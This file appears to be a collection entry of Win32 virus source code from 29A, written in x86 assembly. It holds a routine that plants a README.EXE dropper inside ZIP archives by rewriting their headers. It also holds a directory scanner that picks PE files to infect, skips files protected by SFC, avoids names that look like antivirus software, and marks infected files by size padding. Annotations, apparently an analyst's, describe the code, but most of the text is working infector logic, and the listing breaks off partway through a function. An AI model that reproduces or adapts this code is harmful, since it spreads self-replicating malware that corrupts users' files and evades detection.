
📄 29a-7.006

📁 从29A上收集的病毒源码

        xor     eax,eax
        push    eax
        push    eax
        push    eax
        push    dword 4
        push    eax
        push    dword [fHnd+ebp]
        call    dword [_CreateFileMappingA+ebp]
        or      eax,eax
        jz      near infectionErrorCloseZIP

        mov     dword [fhmap+ebp],eax

        xor     eax,eax
        push    eax
        push    eax
        push    eax
        push    dword 6
        push    dword [fhmap+ebp]
        call    dword [_MapViewOfFile+ebp]
        or      eax,eax
        jz      near infectionErrorCloseMapZIP

        mov     [mapMem+ebp],eax

        ; don't rely too much on next part XD
        ; using ZIP32 for tests

        add     eax,[fileSize+ebp]
        sub     eax,16h

        mov     edx,[eax]
        cmp     edx,06054b50h                   ; a ZIP archive?
        jne     near infectionErrorCloseMapZIP
        
        mov     edx,[eax+10h]                   ; already infected?
        add     edx,[mapMem+ebp]
        cmp     dword [edx+2eh],"READ"
        jne     notFoundZIP
        cmp     dword [edx+2eh+4],"ME.E"
        je      near infectionErrorCloseMapZIP

notFoundZIP:
        mov     cl,[edx+4]                      ; get some things from
        mov     [ZIPCver+ebp],cl                ; this entry to be less
        mov     cl,[edx+5]                      ; suspicious
        mov     [ZIPCos+ebp],cl
        mov     cx,[edx+0ch]
        mov     [ZIPCtim+ebp],cx
        mov     cx,[edx+0eh]
        mov     [ZIPCDat+ebp],cx
        mov     cl,[edx+06h]
        mov     [ZIPCvxt+ebp],cl
        mov     cl,[edx+07h]
        mov     [ZIPCeXos+ebp],cl

        ; now load our droper

        xor     eax,eax
        push    eax
        push    dword 00000007h
        push    dword 00000003h
        push    eax
        push    eax
        push    dword 80000000h
        lea     esi,[dropName+ebp]              ; our dropper
        push    esi
        call    dword [_CreateFileA+ebp]
        inc     eax
        jz      near infectionErrorCloseMapZIP
        dec     eax

        push    eax
        push    dword 0
        push    eax
        call    dword [_GetFileSize+ebp]
        pop     ebx
        inc     eax
        jz      near infectionErrorCloseMapZIP
        dec     eax

        add     [fileSize+ebp],eax              ; new size
        add     dword [fileSize+ebp],EndOfCentral-LocalHeader

        mov     [ZIPSize+ebp],eax               ; update ZIP header
        mov     [ZIPUncmp+ebp],eax
        mov     [ZIPCsiz+ebp],eax
        mov     [ZIPCunc+ebp],eax
        
        push    ebx

        xor     eax,eax
        push    eax
        push    eax
        push    eax
        push    dword 2
        push    eax
        push    ebx
        call    dword [_CreateFileMappingA+ebp]
        pop     ebx
        or      eax,eax
        jz      near infectionErrorCloseMapZIP

        push    ebx
        push    eax
        mov     ebx,eax

        xor     eax,eax
        push    eax
        push    eax
        push    eax
        push    dword 4
        push    ebx
        call    dword [_MapViewOfFile+ebp]
        pop     edx
        pop     ebx
        or      eax,eax
        jz      near infectionErrorCloseMapZIP

        mov     [wideBuffer+ebp],eax            ; view of file
        mov     [wideBuffer+4+ebp],edx          ; file mapping
        mov     [wideBuffer+8+ebp],ebx          ; file handle

        mov     esi,eax                         ; get virus CRC32
        mov     edi,[ZIPSize+ebp]
        call    CRC32
        mov     [ZIPCCrc+ebp],eax
        mov     [ZIPCrc+ebp],eax

        xor     eax,eax
        push    eax
        push    dword [fileSize+ebp]
        push    eax
        push    dword 4
        push    eax
        push    dword [fHnd+ebp]
        call    dword [_CreateFileMappingA+ebp]
        or      eax,eax
        jz      near infectionErrorCloseZIP

        mov     [fhmap+ebp],eax

        xor     eax,eax
        push    dword [fileSize+ebp]
        push    eax
        push    eax
        push    dword 6
        push    dword [fhmap+ebp]
        call    dword [_MapViewOfFile+ebp]
        or      eax,eax
        jz      near infectionErrorCloseMapZIP

        mov     [mapMem+ebp],eax

        add     eax,[dummy+ebp]                 ; size of the old zip
        sub     eax,16h                         ; end header

        mov     ecx,[eax+0ch]                   ; size of central dir
        add     ecx,16h                         ; last header

        mov     esi,[mapMem+ebp]
        add     esi,[eax+10h]                   ; start of dir

        mov     edi,[mapMem+ebp]
        add     edi,[fileSize+ebp]
        sub     edi,ecx                         ; new address

        add     edi,ecx                         ; we must copy it
        add     esi,ecx                         ; reversed

        ; move the central dir
        dec     esi
        dec     edi
moveCentralDir:
        lodsb
        sub     esi,2
        stosb
        sub     edi,2
        dec     ecx
        jnz     moveCentralDir

        mov     eax,[mapMem+ebp]                ; new addres of the
        add     eax,[fileSize+ebp]              ; header
        sub     eax,16h

        ; now add our central entry

        mov     edi,[mapMem+ebp]
        mov     edx,[ZIPSize+ebp]
        add     edx,CentralHeader-LocalHeader
        add     [eax+10h],edx                   ; fix offset
        add     edi,[eax+10h]
        lea     esi,[CentralHeader+ebp]
        mov     ecx,EndOfCentral-CentralHeader
        rep     movsb                           ; add our central entry

        mov     esi,edi                         ; 1st non viral entry

        mov     ecx,EndOfCentral-CentralHeader
        add     [eax+0ch],ecx                   ; fix size
        inc     word [eax+0ah]                  ; one more entry
        inc     word [eax+08h]                  ; once again

        ; now fix the directories offsets
        movzx   ecx,word [eax+0ah]              ; num of entries
        dec     ecx                             ; skip viral one
        mov     ebx,[ZIPSize+ebp]
        add     ebx,CentralHeader-LocalHeader   ; increase len

fixZIPDirLoop:
        add     [esi+2ah],ebx                   ; fix offset
        mov     edx,2eh
        add     dx,[esi+1ch]
        add     dx,[esi+1eh]
        add     dx,[esi+20h]                    ; dir total size
        add     esi,edx
        loop    fixZIPDirLoop

        ; now process local entries
        mov     ebx,[ZIPSize+ebp]
        add     ebx,CentralHeader-LocalHeader
        mov     ecx,[eax+10h]                   ; offs central = local len
        sub     ecx,ebx
        mov     esi,[mapMem+ebp]                ; 1st local
        mov     edi,esi
        add     edi,ebx                         ; new local place

        add     esi,ecx                         ; goto end to move from
        add     edi,ecx                         ; bottom to top

        ; move local entries to its new place
        dec     esi
        dec     edi
moveLocalZIP:
        lodsb
        sub     esi,2
        stosb
        sub     edi,2
        dec     ecx
        jnz     moveLocalZIP

        mov     edi,[mapMem+ebp]
        lea     esi,[LocalHeader+ebp]
        mov     ecx,CentralHeader-LocalHeader
        rep     movsb                           ; copy our local header

        mov     ecx,[ZIPSize+ebp]
        mov     esi,[wideBuffer+ebp]
        rep     movsb                           ; and copy the dropper

        push    dword [wideBuffer+ebp]
        call    dword [_UnmapViewOfFile+ebp]

        push    dword [wideBuffer+4+ebp]
        call    dword [_CloseHandle+ebp]

        push    dword [wideBuffer+8+ebp]
        call    dword [_CloseHandle+ebp]        ; dropper released

infectionErrorCloseUnmapZIP:
        push    dword [mapMem+ebp]
        call    dword [_UnmapViewOfFile+ebp]

infectionErrorCloseMapZIP:
        push    dword [fhmap+ebp]
        call    dword [_CloseHandle+ebp]

        lea     eax,[fileTime2+ebp]
        push    eax
        add     eax,-8
        push    eax
        add     eax,-8
        push    eax
        push    dword [fHnd+ebp]
        call    dword [_SetFileTime+ebp]

infectionErrorCloseZIP:
        push    dword [fHnd+ebp]
        call    dword [_CloseHandle+ebp]

infectionErrorAttribZIP:
        pop     esi
        push    dword [fileAttrib+ebp]
        push    esi
        call    dword [_SetFileAttributesA+ebp]

infectionErrorZIP:
        ret


; - archive.inc EOF -
; - findf.inc BOF -

;
; Simply scan current folder for files to infect
;
;-----------------------------------------------------------------------
; scandirpe - enumerate the current directory with the `fmask` pattern
; and pass each surviving candidate to infectpe.
;
; Analyst notes (describing the code as written; nothing beyond the
; visible listing is asserted):
;   * a candidate needs nFileSizeLow >= 4000h AND a size that is not a
;     multiple of PADDING; a size divisible by PADDING is treated as
;     "already infected".  That divisibility is therefore an observable
;     marker of this family's output (PADDING is defined elsewhere).
;   * names that isAV flags (CF set on return; isAV's tail lies outside
;     this listing) are skipped.
;   * if the SfcIsFileProtected import was resolved, the name is widened
;     with MultiByteToWideChar, expanded with GetFullPathNameW, and
;     SFC-protected files are left alone.
; All data/import references are [label+ebp]; ebp presumably carries the
; code's relocation delta and is set by the caller - not verified here.
; nFileSizeLow / cFileName look like fields of finddata (WIN32_FIND_DATA)
; - assumed, their definitions are not in this listing.
; Clobbers at least eax, ecx, edx, esi, edi and flags, plus whatever
; isAV and infectpe clobber; nothing is saved or restored here.
;-----------------------------------------------------------------------
scandirpe:
        lea     eax,[finddata+ebp]
        push    eax                                     ; lpFindFileData
        lea     eax,[fmask+ebp]
        push    eax                                     ; lpFileName = search pattern
        call    dword [_FindFirstFileA+ebp]
        inc     eax                                     ; INVALID_HANDLE_VALUE (-1)?
        jz      near notFound                           ; nothing matched -> leave
        dec     eax                                     ; restore the search handle

        mov     dword [findHnd+ebp],eax

findNext:
        ; per-file filter chain: every rejection falls to skipThisFile,
        ; which advances the enumeration
        mov     eax,dword [nFileSizeLow+ebp]            ; avoid small files
        cmp     eax,4000h                               ; < 16 KiB -> skip
        jb      near skipThisFile
        mov     ecx,PADDING                             ; avoid already
        xor     edx,edx                                 ; infected files
        div     ecx                                     ; edx = size mod PADDING
        or      edx,edx
        jz      near skipThisFile                       ; remainder 0 -> taken as infected

        lea     esi,[cFileName+ebp]                     ; esi = file name (ANSI)

        call    isAV                                    ; uppercases the name in place
        jc      near skipThisFile                       ; CF set -> looks AV-related, skip

        mov     eax,[_SfcIsFileProtected+ebp]           ; we have sfc?
        or      eax,eax                                 ; zero when the import is unresolved
        jz      near sfcNotAvailable

        ; hehe i've noticed SfcIsFileProtected requires
        ; a wide string not the ansi one... shit
        ; moreover sfc only manages full path names :/
        ; i'm glad with win2000 to test all this things =]

        ; MultiByteToWideChar(CP_ACP, 0, esi, -1, wideBuffer, 260)
        push    dword 260                               ; cchWideChar = 260 wide chars
        lea     edi,[wideBuffer+ebp]
        push    edi                                     ; wide buffer
        xor     eax,eax
        dec     eax
        push    eax                                     ; -1 (zstring)
        push    esi                                     ; ANSI
        inc     eax
        push    eax                                     ; 0  (dwFlags)
        push    eax                                     ; CP_ACP == 0
        call    dword [_MultiByteToWideChar+ebp]
        or      eax,eax                                 ; 0 chars written = failure
        jz      skipThisFile                            ; damn

        ; GetFullPathNameW(wideBuffer, 260, wideBuffer2, &dummy)
        lea     esi,[dummy+ebp]
        push    esi                                     ; lpFilePart (discarded)
        lea     esi,[wideBuffer2+ebp]
        push    esi                                     ; lpBuffer = full path out
        push    dword 260                               ; nBufferLength
        lea     esi,[wideBuffer+ebp]
        push    esi                                     ; lpFileName = wide name
        call    dword [_GetFullPathNameW+ebp]
        or      eax,eax                                 ; 0 = failure
        jz      skipThisFile                            ; damn (2)

        ; SfcIsFileProtected(0, wideBuffer2)
        lea     esi,[wideBuffer2+ebp]
        push    esi                                     ; ProtFileName (full wide path)
        push    dword 0                                 ; RpcHandle = NULL
        call    dword [_SfcIsFileProtected+ebp]         ; check this file
        or      eax,eax
        jnz     skipThisFile                            ; non-zero = protected -> skip

sfcNotAvailable:
        ; no SFC check possible (or file unprotected): esi is reloaded
        ; because the calls above reused it
        lea     esi,[cFileName+ebp]
        call    infectpe                                ; esi = ANSI file name

skipThisFile:
        ; FindNextFileA(findHnd, &finddata); non-zero = another entry
        lea     eax,[finddata+ebp]
        push    eax
        push    dword [findHnd+ebp]
        call    dword [_FindNextFileA+ebp]
        or      eax,eax
        jnz     near findNext

endScan:
        push    dword [findHnd+ebp]
        call    dword [_FindClose+ebp]                  ; release the search handle

notFound:
        ret

; make the ASCII string uppercase and look for some stringz usual in
; antiviral software to avoid infecting them
isAV:
        push    esi
UCaseLoop:
        cmp     byte [esi],'a'
        jb      notUCase
        cmp     byte [esi],'z'
        ja      notUCase
        sub     byte [esi],'a'-'A'
notUCase:
        lodsb
        or      al,al
        jnz     UCaseLoop
        mov     esi,[esp]
avStrLoop:
        mov     ax,word [esi]
        not     ax
        cmp     ax,~'AV'
        je      itIsAV
        cmp     ax,~'DR'
        je      itIsAV
        cmp     ax,~'SP'
        je      itIsAV
        cmp     ax,~'F-'
        je      itIsAV
        cmp     ax,~'AN'
        je      itIsAV
        cmp     ax,~'VE'
        je      itIsAV
        cmp     ax,~'CL'
        je      itIsAV
        cmp     ax,~'ON'
        je      itIsAV
        not     ax
        inc     esi
